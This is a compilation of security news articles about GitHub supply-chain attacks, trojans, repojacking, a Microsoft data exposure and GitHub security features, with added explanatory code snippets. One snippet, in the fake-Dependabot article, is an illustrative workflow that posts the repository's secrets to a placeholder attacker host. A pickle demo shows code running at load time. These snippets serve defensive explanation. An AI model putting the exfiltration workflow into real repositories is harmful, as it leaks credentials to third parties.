Attackers distribute trojans using AWS and GitHub


Researchers at FortiGuard Labs have uncovered a phishing campaign that tricks users into downloading a malicious Java downloader used to deliver VCURMS and STRRAT, two remote access trojans (RATs).

The first RAT can harvest information from several applications, such as Discord and Steam, and collect cookies, autofill data, browsing history, and passwords stored in the browser. VCURMS can also access the device's network information and hardware details, enumerate running processes, and capture screenshots. The second trojan not only lets an attacker steal credentials from browsers and applications, but also acts as a keylogger.


To gain initial access to the victim's device, the attackers send an email asking the recipient to verify payment information, with a PDF file attached. The file is actually an executable that, once opened, downloads and runs a malicious JAR file on the victim's device.

The file installs the two RATs, and VCURMS copies itself into the Windows Startup folder so that it runs at every system startup. The first trojan handles communication with the attackers: as soon as the victim is online, it connects to the C2 server to receive instructions.
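
The Startup-folder persistence described above is easy to spot once you know to look for it. The following is a defensive sketch (not FortiGuard's tooling; the pure helper exists only so the check is testable) that lists JAR files sitting in the Windows per-user Startup folder:

```python
import os

# Windows per-user Startup folder; anything placed here runs at logon.
STARTUP_DIR = os.path.expandvars(
    r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
)

def flag_jar_entries(entries):
    """Return the entries that are JAR files. A Java RAT persisting via
    the Startup folder, as VCURMS does, would show up in this list."""
    return [name for name in entries if name.lower().endswith(".jar")]

if os.path.isdir(STARTUP_DIR):  # only meaningful on a Windows host
    for name in flag_jar_entries(os.listdir(STARTUP_DIR)):
        print(f"unexpected JAR in Startup: {name}")
```

A legitimate shortcut such as `OneDrive.lnk` passes the filter, while a dropped `update.jar` is flagged for review.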

According to FortiGuard Labs' analysis, the attackers use services such as AWS and GitHub to distribute the JAR files and rely on commercial protectors to evade security checks.

To protect against this type of attack, it is essential to always verify the legitimacy of email senders and to avoid downloading attachments unless you are absolutely certain of their origin.



https://www.securityinfo.it/2024/03/14/attaccanti-distribuiscono-trojan-usando-aws-e-github/?utm_source=rss&utm_medium=rss&utm_campaign=attaccanti-distribuiscono-trojan-usando-aws-e-github




There are more than 100,000 malicious repositories on GitHub


Researchers at Apiiro, a provider of unified security solutions, have identified the expansion of a repository confusion campaign that has so far impacted thousands of GitHub repos. The campaign, which began in the middle of last year, peaked in recent months.

In repository confusion attacks, attackers aim to trick victims into downloading their infected code instead of the real one. Typically, they clone the target repo, infect it with malware payloads, and upload it to GitHub under the same name. To increase the chances of it being downloaded, they create hundreds of forks and then promote the repository on the web through developer forums and chats.
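
The clone-and-reupload trick works because a repository's name alone says nothing about who published it. One minimal mitigation (an illustrative sketch with a hypothetical allowlist, not part of Apiiro's research) is to pin the GitHub owner you trust for each dependency and refuse anything else:

```python
# Hypothetical pinned allowlist: dependency name -> trusted GitHub owner.
TRUSTED_OWNERS = {
    "requests": "psf",
    "flask": "pallets",
}

def is_expected_owner(repo_full_name: str) -> bool:
    """Check an 'owner/name' string against the pinned allowlist.
    A look-alike repo uploaded under a different account with the
    same name fails this check."""
    owner, _, name = repo_full_name.partition("/")
    return TRUSTED_OWNERS.get(name) == owner

print(is_expected_owner("psf/requests"))         # True: legitimate owner
print(is_expected_owner("rnd-acct42/requests"))  # False: repository-confusion clone
```

The allowlist approach is crude but cheap, and it catches exactly the failure mode described here: same name, different publisher.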

Once developers download the repository, the hidden payload installs malware that collects login credentials from various applications, browser passwords and cookies, and other sensitive data, and sends it all to the attackers' C2 server.

Many of the malicious repositories have been removed by GitHub because of their hundreds of forks, but many others have managed to evade the platform's checks. The researchers explain that the campaign operates at a very large scale, so the number of repositories still online runs into the hundreds of thousands; counting the removed repos as well, the total amounts to millions of malicious applications. Moreover, given the broad reach of the attacks, they generate a kind of "second-order social engineering" network, as developers share the harmful repos without knowing they contain malware.


The repository confusion technique offers several advantages on GitHub. First, the platform hosts so many repos that, however numerous the malicious instances are, they still represent an insignificant fraction of the total and are therefore hard to detect. Second, this campaign does not rely on package managers, which makes the malicious repos harder to recognize. Finally, since the targeted repositories are little known and used only by a niche of developers, it is easier to mislead users.

“GitHub has been notified of the issue and most of the malicious repositories have been deleted,” the researchers write, “but the campaign continues, and attacks that attempt to inject malicious code into the supply chain are becoming increasingly widespread.”

Beyond urging developers to carefully review the repositories they download, Apiiro recommends that organizations deploy code-monitoring solutions that use AI-based analysis techniques to identify suspicious portions of code.



https://www.securityinfo.it/2024/03/01/su-github-ci-sono-piu-di-100-000-repository-malevoli/?utm_source=rss&utm_medium=rss&utm_campaign=su-github-ci-sono-piu-di-100-000-repository-malevoli




Stolen GitHub Credentials Used to Push Fake Dependabot Commits

Threat actors have been observed pushing fake Dependabot contributions to hundreds of GitHub repositories in an effort to inject malicious code, application security firm Checkmarx reports.

Identified in July, the campaign relied on stolen GitHub personal access tokens to gain access to repositories and push code to steal sensitive information from projects and passwords from end users.

To evade detection, the attackers faked commit messages to make them appear as if generated by Dependabot, GitHub’s free automated dependency management tool that helps software developers identify and address vulnerabilities in their code.

Dependabot continuously scans a project’s dependencies and generates pull requests when identifying issues. The update requests, however, need user acknowledgement.

As part of the observed campaign, the attackers created a commit message “fix” that appeared to be contributed by the ‘dependabot[bot]’ user account, tricking developers into believing the commits came from GitHub’s tool.
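
Because the spoofed commits only imitate Dependabot's identity, one tell is GitHub's signature verification: commits genuinely made by the `dependabot[bot]` account carry a GitHub-verified signature, while a commit pushed with a stolen PAT and a faked author string does not. A sketch of that check (an illustration, not Checkmarx's tooling; the inputs correspond to the commit author name and the verification flag the GitHub REST API exposes per commit):

```python
def looks_like_spoofed_dependabot(author_name: str, verified: bool) -> bool:
    """Flag commits that claim to come from dependabot[bot] but lack a
    GitHub-verified signature, as in the campaign described above."""
    return author_name == "dependabot[bot]" and not verified

print(looks_like_spoofed_dependabot("dependabot[bot]", verified=False))  # True: suspicious
print(looks_like_spoofed_dependabot("dependabot[bot]", verified=True))   # False: genuine bot commit
```

In a real audit, the two inputs would come from each commit object returned by the repository's commits endpoint.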

Using this technique, the threat actors targeted hundreds of repositories, including private repositories, adding a new “hook.yml” file as a workflow file, to send GitHub secrets to an external server on every push event.
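
A single workflow file is this damaging because any push-triggered GitHub Action can read the repository's secrets context. The following is a reconstructed illustration of the shape such a "hook.yml" could take, not the attackers' actual file; `attacker.example` is a placeholder:

```yaml
# Illustrative only: a workflow that fires on every push event
# and forwards the repository's secrets to an external server.
name: hook
on: push
jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
      # The secrets context is available to workflow expressions,
      # so one step can serialize and POST it elsewhere.
      - run: curl -s -X POST https://attacker.example/collect -d '${{ toJSON(secrets) }}'
```

This is why unexpected workflow files appearing in a push deserve the same scrutiny as code changes.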

In addition to injecting this GitHub Action, the attackers modified all .js files within the targeted projects, by appending an obfuscated line of code at the end.


The code would create a new script tag when executed in a browser, while also loading an additional script from a remote server, to intercept password-based forms and send user credentials to the attackers.

According to Checkmarx, the stolen GitHub personal access tokens used in this campaign were most likely exfiltrated from the victims’ systems after they downloaded a malicious package.

The security firm notes that the attacks were likely automated, and that it was difficult for the victims to identify the token compromise, as the token’s access log activity does not show in the account’s audit log.

“This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub. This is the first incident we witnessed a threat actor using fake git commits to disguise activity, knowing that many developers do not check the actual changes of Dependabot when they see it,” Checkmarx notes.

Related: GitHub Rotates Publicly Exposed RSA SSH Private Key

Related: Attackers Can Abuse GitHub Codespaces for Malware Delivery

Related: GitHub Announces New Security Improvements

https://www.securityweek.com/stolen-github-credentials-used-to-push-fake-dependabot-commits/




Microsoft AI Researchers Expose 38TB of Data, Including Keys, Passwords and Internal Messages

Researchers at Wiz have flagged another major security misstep at Microsoft that caused the exposure of 38 terabytes of private data during a routine open source AI training material update on GitHub.

The exposed data includes a disk backup of two employees’ workstations, corporate secrets, private keys, passwords, and over 30,000 internal Microsoft Teams messages, Wiz said in a note documenting the discovery.

Wiz, a cloud data security startup founded by ex-Microsoft software engineers, said the issue was discovered during routine internet scans for misconfigured storage containers. “We found a GitHub repository under the Microsoft organization named robust-models-transfer. The repository belongs to Microsoft’s AI research division, and its purpose is to provide open-source code and AI models for image recognition,” the company explained.

To share the files, Microsoft used an Azure feature called SAS tokens, which allows data to be shared from Azure Storage accounts. Although the access level can be limited to specific files, Wiz found that the link was configured to share the entire storage account, including another 38TB of private files.

“This URL allowed access to more than just open-source models. It was configured to grant permissions on the entire storage account, exposing additional private data by mistake,” Wiz noted.

“Our scan shows that this account contained 38TB of additional data — including Microsoft employees’ personal computer backups. The backups contained sensitive personal data, including passwords to Microsoft services, secret keys, and over 30,000 internal Microsoft Teams messages from 359 Microsoft employees,” it added. 

In addition to what it describes as overly permissive access scope, Wiz found that the token was also misconfigured to allow “full control” permissions instead of read-only, giving attackers the power to delete and overwrite existing files.


“An attacker could have injected malicious code into all the AI models in this storage account, and every user who trusts Microsoft’s GitHub repository would’ve been infected by it,” Wiz warned.

The repository's primary function compounds the security concerns: it distributes AI models in the ‘ckpt’ format, which is produced by the widely used TensorFlow library and serialized with Python's pickle module. Wiz notes that the format itself can be a gateway for arbitrary code execution.
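
The pickle risk is easy to demonstrate: deserializing a pickle executes whatever callable the payload's `__reduce__` method names, which is why a tampered `.ckpt` file can run arbitrary code the moment a model is loaded. A benign, stdlib-only sketch:

```python
import pickle

class Malicious:
    def __reduce__(self):
        # Tells the unpickler: "reconstruct me by calling str.upper(...)".
        # A real payload would name os.system or similar instead.
        return (str.upper, ("this ran during unpickling",))

blob = pickle.dumps(Malicious())
result = pickle.loads(blob)  # the attacker-chosen call happens here, at load time
print(result)                # prints "THIS RAN DURING UNPICKLING"
```

Nothing in `blob` looks like code to a casual inspection; the execution is a side effect of loading, which is exactly the property an attacker with write access to the storage account could have abused.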


According to Wiz, Microsoft’s security response team invalidated the SAS token within two days of initial disclosure in June this year. The token was replaced on GitHub a month later.

Microsoft has published its own blog post to explain how the data leak occurred and how such incidents can be prevented.

“No customer data was exposed, and no other internal services were put at risk because of this issue. No customer action is required in response to this issue,” the tech giant noted.

*updated with link to Microsoft’s blog post

Related: Microsoft Puts ChatGPT to Work on Automating Security

Related: OpenAI Using Security to Sell ChatGPT Enterprise

Related: Wiz Says 62% of AWS Environments Exposed to Zenbleed

Related: Microsoft Hack Exposed More Than Exchange, Outlook Emails

https://www.securityweek.com/microsoft-ai-researchers-expose-38tb-of-data-including-keys-passwords-and-internal-messages/




Thousands of Code Packages Vulnerable to Repojacking Attacks

Despite GitHub’s efforts to prevent repository hijacking, cybersecurity researchers continue finding new attack methods, and thousands of code packages and millions of users could be at risk.

Repojacking is a repository hijacking method that involves renamed GitHub usernames. If a user renames their account, their old username can be registered by someone else, including malicious actors, and potentially abused for supply chain attacks.

Threat actors may be able to register an old username and create repositories that were previously associated with the old username, which could allow them to route traffic intended for the legitimate repository to their malicious repository. 

In order to prevent such attacks, GitHub has been implementing a retired namespace protection mechanism and it has been warning users about the potential risks associated with changing usernames. 

The namespace is the combination of the username and a specific repository name (for example, github.com/username/repo_name). If a user changes their username, the old username's new owner cannot create a repository named ‘repo_name’ if the repository was previously cloned 100 times; in that case, GitHub has retired the namespace.
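
A renamed account leaves a detectable trace: requests for the old `owner/repo` path are permanently redirected to the new owner. A pure helper sketch (illustrative only; a real checker would issue the HTTP request itself and feed the response in):

```python
def namespace_migrated(status_code, location, original_path):
    """True when a request for github.com/<original_path> was permanently
    redirected somewhere else -- the precondition for repojacking, since
    the old username may then be claimable."""
    if status_code != 301 or not location:
        return False
    return original_path.lower() not in location.lower()

# Old namespace now redirects to the renamed account: worth investigating.
print(namespace_migrated(301, "https://github.com/new-owner/tool", "old-owner/tool"))  # True
# Repository still served under its original owner: nothing to do.
print(namespace_migrated(200, None, "old-owner/tool"))  # False
```

Dependency paths that trip this check are the ones to audit, because an attacker who registers the abandoned username could serve a malicious repository at the old address.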

The problem is that researchers continue finding ways to bypass GitHub’s namespace retirement mechanism and conduct repojacking. 

The most recently disclosed attack method was discovered by researchers at cybersecurity firm Checkmarx in March and it was recently fixed by GitHub. 

This new method leveraged a race condition, with an API request being used to almost simultaneously create a new repository and change the account’s username. 


If the attacker renames their account to the targeted username and later attempts to create a repository that would result in the creation of a retired namespace, their attempt would be blocked.

However — before GitHub rolled out a fix — if the account renaming and the repository creation were done at the same time, the attempt would be successful, enabling the attacker to obtain a namespace that would allow them to redirect traffic to their malicious repository. 

Checkmarx’s analysis showed that roughly 4,000 code packages in Go, PHP, Swift, as well as GitHub Actions were impacted, including hundreds of packages with more than 1,000 stars. 

“Poisoning a popular GitHub action could lead to major Supply Chain attacks with significant repercussions,” Checkmarx warned.

The problem is that these packages will continue to be vulnerable to repojacking if a new bypass method is discovered in the future.

“The discovery of this novel vulnerability in GitHub’s repository creation and username renaming operations underlines the persistent risks associated with the ‘Popular repository namespace retirement’ mechanism,” Checkmarx said in a blog post.

It added, “Many GitHub users, including users that control popular repositories and packages, choose to use the ‘User rename’ feature GitHub offers. For that reason, the attempt to bypass the ‘Popular repository namespace retirement’ remains an attractive attack point for supply chain attackers with the potential to cause substantial damages.”

The security firm has released an open source tool named ChainJacking that can be used to identify vulnerable packages. 

Related: Developers Warned of Malicious PyPI, NPM, Ruby Packages Targeting Macs

Related: ChatGPT Hallucinations Can Be Exploited to Distribute Malicious Code Packages

Related: Malicious NuGet Packages Used to Target .NET Developers

https://www.securityweek.com/thousands-of-code-packages-vulnerable-to-repojacking-attacks/




Microsoft offers legal protection for AI copyright infringement challenges


On Thursday, Microsoft announced that it will provide legal protection for customers who are sued for copyright infringement over content generated by the company’s AI systems. This new policy, called the Copilot Copyright Commitment, is an expansion of Microsoft’s existing intellectual property indemnification coverage, Reuters reports.

Microsoft’s announcement comes as generative AI tools like ChatGPT have raised concerns about reproducing copyrighted material without proper attribution. Microsoft has heavily invested in AI through products like GitHub Copilot and Bing Chat that can generate original code, text, and images on demand. Its AI models have gained these capabilities by scraping publicly available data off of the Internet without seeking express permission from copyright holders.

By offering legal protection, Microsoft aims to give customers confidence in deploying its AI systems without worrying about potential copyright issues. The policy covers damages and legal fees, providing customers with an added layer of protection as generative AI sees rapid adoption across the tech industry.

“As customers ask whether they can use Microsoft’s Copilot services and the output they generate without worrying about copyright claims, we are providing a straightforward answer: yes, you can, and if you are challenged on copyright grounds, we will assume responsibility for the potential legal risks involved,” writes Microsoft.

Under the new commitment, Microsoft will pay any legal damages for customers using Copilot, Bing Chat, and other AI services as long as they use built-in guardrails.

“Specifically, if a third party sues a commercial customer for copyright infringement for using Microsoft’s Copilots or the output they generate, we will defend the customer and pay the amount of any adverse judgments or settlements that result from the lawsuit, as long as the customer used the guardrails and content filters we have built into our products,” writes Microsoft.

With the rise of generative AI, the tech industry has been grappling with questions about properly crediting or licensing copyrighted source material used in training AI models. Legal experts say these thorny copyright issues will likely be decided through future legislation and court cases, some of which are already underway.

In fact, Microsoft has already attracted litigation over Copilot technology. Last November, the Joseph Saveri Law Firm filed a class-action lawsuit against Microsoft and OpenAI over GitHub Copilot’s alleged copyright violations that arose from scraping publicly available code repositories. Currently, the status of that lawsuit is unknown, and Ars Technica could not confirm if the case is still active using public records.

https://arstechnica.com/?p=1966332




GitHub Enterprise Server Gets New Security Capabilities

GitHub on Tuesday announced the general availability of Enterprise Server 3.10 with new security capabilities, including support for custom deployment rules.

With the new release, GitHub Projects is now generally available in Enterprise Server, providing administrators with increased visibility over issues and pull requests.

Now, teams using GitHub Actions can also create their own custom deployment protection rules, to ensure that only “the deployments that pass all quality, security, and manual approval requirements make it to production,” the code hosting platform explains.

The new release also provides administrators with additional control over the management and security of runners in GitHub Actions, allowing them to disable repository-level self-hosted runners across the entire organization and cross-user namespaces, to ensure that jobs are hosted on centrally managed machines only.

GitHub Enterprise Server 3.10 also makes it easier for developers to set up code scanning on their repositories, using the new default setup, without the need for YAML files. The new default setup also allows teams to enable code scanning across multiple repositories at once.

According to GitHub, the new release also makes it easier for security teams to track coverage and risks across all repositories, from the enterprise-level “code security” pages, through the Dependabot feature.

An ability to filter alerts on a repository by file path or language should make it easier to prioritize remediation efforts, while the newly added Swift support (which follows Kotlin support in the previous release) results in GitHub’s code scanning now covering iOS and Android development languages as well.


GitHub also introduces fine-grained Personal Access Tokens in Enterprise Server, to minimize risks if one token is leaked (previously, PATs could be granted broad permissions across all repositories).

Developers can now select from a set of over 50 granular permissions, each with ‘no access’, ‘read’, or ‘read and write’ access options.

“Fine-grained PATs also have an expiration date, and they only have access to the repositories or organizations they are explicitly granted access to. This makes it easy for developers to follow a least privileged access model when using PATs,” GitHub explains.
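
In practice, a fine-grained PAT is used like any bearer token against the REST API; the token string and repository below are placeholders in an illustrative sketch, not GitHub documentation:

```python
import urllib.request

TOKEN = "github_pat_XXXX"  # hypothetical placeholder; never hard-code real tokens

def github_request(path):
    """Build a GitHub REST API request authenticated with a fine-grained
    PAT. The call only succeeds for repositories the token was explicitly
    granted, and only within its per-permission access level."""
    return urllib.request.Request(
        f"https://api.github.com{path}",
        headers={
            "Authorization": f"Bearer {TOKEN}",
            "Accept": "application/vnd.github+json",
        },
    )

req = github_request("/repos/octocat/hello-world")
print(req.full_url)  # https://api.github.com/repos/octocat/hello-world
```

The least-privilege payoff is that leaking this token exposes only the repositories and permissions it was scoped to, rather than the account-wide access a classic PAT carried.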

The latest GitHub Enterprise Server release also brings refined branch protections (changes to how required protections are enforced, and on preventing last pushers from approving pull requests) and improved backup operations.

Related: GitHub Paid Out $1.5 Million in Bug Bounties in 2022

Related: GitHub Secret-Blocking Feature Now Generally Available

Related: GitHub Announces New Security Improvements

https://www.securityweek.com/github-enterprise-server-gets-new-security-capabilities/




The huge power and potential danger of AI-generated code


In June 2021, GitHub announced Copilot, a kind of auto-complete for computer code powered by OpenAI’s text-generation technology. It provided an early glimpse of the impressive potential of generative artificial intelligence to automate valuable work. Two years on, Copilot is one of the most mature examples of how the technology can take on tasks that previously had to be done by hand.

This week GitHub released a report, based on data from almost a million programmers paying to use Copilot, that shows how transformational generative AI coding has become. On average, they accepted the AI assistant’s suggestions about 30 percent of the time, suggesting that the system is remarkably good at predicting useful code.

The striking chart above shows how users tend to accept more of Copilot’s suggestions as they spend more months using the tool. The report also concludes that AI-enhanced coders see their productivity increase over time, based on the fact that a previous Copilot study reported a link between the number of suggestions accepted and a programmer’s productivity. GitHub’s new report says that the greatest productivity gains were seen among less experienced developers.

On the face of it, that’s an impressive picture of a novel technology quickly proving its value. Any technology that enhances productivity and boosts the abilities of less skilled workers could be a boon for both individuals and the wider economy. GitHub goes on to offer some back-of-the-envelope speculation, estimating that AI coding could boost global GDP by $1.5 trillion by 2030.

But GitHub’s chart showing programmers bonding with Copilot reminded me of another study I heard about recently while chatting with Talia Ringer, a professor at the University of Illinois at Urbana-Champaign, about coders’ relationship with tools like Copilot.

Late last year, a team at Stanford University posted a research paper that looked at how using a code-generating AI assistant they built affects the quality of code that people produce. The researchers found that programmers getting AI suggestions tended to include more bugs in their final code—yet those with access to the tool tended to believe that their code was more secure. “There are probably both benefits and risks involved” with coding in tandem with AI, says Ringer. “More code isn’t better code.”

When you consider the nature of programming, that finding is hardly surprising. As Clive Thompson wrote in a 2022 WIRED feature, Copilot can seem miraculous, but its suggestions are based on patterns in other programmers’ work, which may be flawed. These guesses can create bugs that are devilishly difficult to spot, especially when you are bewitched by how good the tool often is.

We know from other areas of engineering that humans can be lulled into overreliance on automation. The US Federal Aviation Authority has repeatedly warned that some pilots are becoming so dependent on autopilot that their flying skills are atrophying. A similar phenomenon is familiar from self-driving cars, where extraordinary vigilance is required to guard against rare yet potentially deadly glitches.

This paradox may be central to the developing story of generative AI—and where it will take us. The technology already appears to be driving a downward spiral in the quality of web content, as reputable sites are flooded with AI-generated dross, spam websites proliferate, and chatbots try to artificially juice engagement.

None of this is to say that generative AI is a bust. There is a growing body of research that shows how generative AI tools can boost the performance and happiness of some workers, such as those who handle customer support calls. Some other studies have also found no increase in security bugs when developers use an AI assistant. And to its credit, GitHub is researching the question of how to safely code with AI assistance. In February, it announced a new Copilot feature that tries to catch vulnerabilities generated by the underlying model.

But the complex effects of code generation provide a cautionary tale for companies working to deploy generative algorithms for other use cases.

Regulators and lawmakers showing more concern about AI should also take note. With so much excitement about the technology’s potential—and wild speculation about how it could take over the world—subtler and yet more substantive evidence of how AI deployments are working out could be overlooked. Just about everything in our future will be underpinned by software—and if we’re not careful, it might also be riddled with AI-generated bugs.

This story originally appeared on wired.com.

https://arstechnica.com/?p=1951176




After 18 months, GitHub’s big code search overhaul is generally available

GitHub has announced the general availability of a ground-up rework of its code search that has been in development for years.

The changes include substantial new functionality that is significantly more aware of context. The company says its new code search is “about twice as fast” as the old code search and that it “understands code, putting the most relevant results first.”

That’s on top of redesigned search and code view interfaces. The new search interface offers suggestions and completions and categorizes and formats the results more intelligently.

Within the code view, you can easily see references in a side panel, more or less matching what you’d be able to do in Visual Studio when it comes to looking up and navigating to references. Substring queries, regular expressions, and symbol search are also supported.

GitHub published a guide to syntax, including but not limited to the usual stuff like leveraging boolean operations in queries or performing an exact search with quotation marks. There are also more specific features, like limiting your search to a specific repository, language, path, or organization.
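
A few illustrative query shapes combining those features (the repository and symbol names are just examples; check the qualifiers against GitHub's own syntax guide):

```text
repo:torvalds/linux kmalloc              limit the search to one repository
org:github language:go path:cmd/ flag    organization, language and path filters
"run the following command"              exact match with quotation marks
/sha-?(1|256)/                           regular expression between slashes
symbol:ParseQuery language:go            symbol search
```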

This overhaul was first made available as a technology preview with a waitlist in December 2021. Those who opted in and were offered the new search spent a long time using it alongside the old code search as a separate tool.

If you want to go way deeper in understanding it, you can check out the GitHub engineering blog’s February 2023 post detailing exactly how it works, which technologies were used to build it, and so on.

The changes are meant to improve productivity for software developers—for example, the new search could be much more efficient for finding specific vulnerabilities in a large codebase.

As noted, the change has been in the works for a while, but GitHub is positioning it as part of a larger initiative to bring more intelligence to the platform. The other most notable bullet point in that initiative is the enrichment and expansion of the AI coding tool Copilot, leveraging generative AI.


https://arstechnica.com/?p=1937544




GitHub Announces New Security Improvements

Microsoft-owned code hosting platform GitHub this week introduced NPM package provenance and deployment protection rules and announced the general availability of private vulnerability reporting.

Following a beta launch in November 2022, GitHub has now made private vulnerability reporting generally available, providing security researchers with a direct channel to report security defects they identify in public repositories.

To take advantage of the new capability, repository maintainers need to enable it in the ‘Security’ section of their repository’s ‘Settings’.

Once private vulnerability reporting has been enabled, security researchers can send bug reports to the maintainers, who can request for additional information and avoid being contacted publicly.

Now that the capability is generally available, maintainers can enable it at scale, for all repositories in their organization, they can select how to credit the reporters, and benefit from new integration and automation workflows, through a new repository security advisories API.

Starting this week, developers building NPM projects on GitHub Actions can publish package provenance, to provide users with information on source repositories and the build instructions used to publish it. GitHub will also collect this information.

Following an increase in software supply chain attacks where attackers compromise dependencies to inject malicious code into packages, the goal of NPM package provenance is to increase trust in the ecosystem, by providing visibility into how the code was translated into the published artifact.

“Our goal for the npm ecosystem is to bring the same level of transparency we have with the open source code itself to the process by which that code is built and published,” GitHub says.

To create a verifiable signature over the provenance statement, GitHub is requiring that packages are built using a trusted CI/CD platform. Furthermore, the provenance attestation is uploaded to Sigstore’s Rekor service, to offer visibility into tampering attempts.

“This provides visibility to the specific commit which triggered the build and the instructions which were used to publish the final artifact. With that information we increase the auditability of the build and make any attempt to tamper with the code much more visible,” the code hosting platform explains.

The third GitHub capability introduced this week is the public beta of deployment protection rules, which allows GitHub Enterprise Cloud (GHEC) users to employ the management mechanisms they need to ensure their applications are secure.

The rules bring additional controls to GitHub Actions CI/CD workflows, such as enforcing quality gates on deployments and allow GHEC users to create their own controls and even share them in the form of an application published to the GitHub marketplace.

A set of rules is already available to GHEC customers from several GitHub partners, including Datadog, Honeycomb, New Relic, NodeSource, Sentry, and ServiceNow.

Related: GitHub Secret Scanning Now Generally Available

Related: GitHub Introduces Automatic Vulnerability Scanning Feature

Related: GitHub Introduces Private Vulnerability Reporting for Public Repositories

https://www.securityweek.com/github-announces-new-security-improvements/